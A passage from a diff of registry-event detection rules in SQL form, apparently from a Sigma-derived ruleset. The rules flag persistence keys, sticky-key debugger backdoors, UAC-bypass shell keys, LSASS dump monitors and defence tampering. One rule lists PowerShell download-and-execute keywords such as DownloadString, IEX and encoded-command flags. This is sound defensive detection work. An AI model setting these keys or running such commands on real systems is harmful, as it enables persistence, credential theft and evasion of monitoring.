non-default, legitimate at usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (Details LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject 
LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" ], - "filename": "registry_set_fax_dll_persistance.yml" + "filename": "registry_event_susp_atbroker_change.yml" }, { - "title": "Change Winevt Event Access Permission Via Registry", - "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", - "status": "experimental", - "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", - "author": "frack113", + "title": "WINEKEY Registry Modification", + "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "status": "test", + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "author": "omkar72", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" ], - "filename": "registry_set_change_winevt_channelaccess.yml" + 
"filename": "registry_event_runkey_winekey.yml" }, { - "title": "Suspicious Printer Driver Empty Manufacturer", - "id": "e0813366-0407-449a-9869-a2db1119dc41", - "status": "test", - "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of a Local Hidden User Account by Registry", + "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "status": "experimental", + "description": "Sysmon registry detection of a local hidden user account.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_susp_printer_driver.yml" + "filename": "registry_event_add_local_hidden_user.yml" }, { - "title": "Suspicious Powershell In Registry Run Keys", - "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "status": 
"experimental", - "description": "Detects potential PowerShell commands or code within registry run keys", - "author": "frack113, Florian Roth", + "title": "Windows Registry Trust Record Modification", + "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "status": "test", + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate admin or third party scripts. Baseline according to your environment" + "Alerts on legitimate macro usage as well, will need to filter as appropriate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%TrustRecords%' ESCAPE '\\')" ], - "filename": "registry_set_powershell_in_run_keys.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "DNS-over-HTTPS Enabled by Registry", - "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", "status": "test", - "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", - "author": "Austin Songer", + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1112" - ], - "falsepositives": [ - "Unlikely" + "attack.persistence", + "attack.t1547.001" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_dns_over_https_enabled.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "ScreenSaver 
Registry Key Set", - "id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of screen saver" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE%' ESCAPE '\\' AND Details LIKE '%.scr' ESCAPE '\\') AND NOT ((Details LIKE '%C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_scr_file_executed_by_rundll32.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Registry Disable System Restore", - "id": "5de03871-5d46-4539-a82d-3aa992a69a83", - "status": "experimental", - "description": "Detects the modification of the registry to disable a system restore on the computer", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.impact", - "attack.t1490" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE 
'%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_system_restore.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Add Port Monitor Persistence in Registry", - "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", - "status": "experimental", - "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", - "author": "frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' 
AND EventType = 'SetValue') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "status": "experimental", - "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. 
Which will get invoked when an application crashes", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - 
"title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "status": "test", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin 
mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without 
disconnecting the other users\n", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Legitimate administrators removing applications (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects registry modifications that disable Privacy Settings Experience", - "author": "frack113", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": "frack113", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1070", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
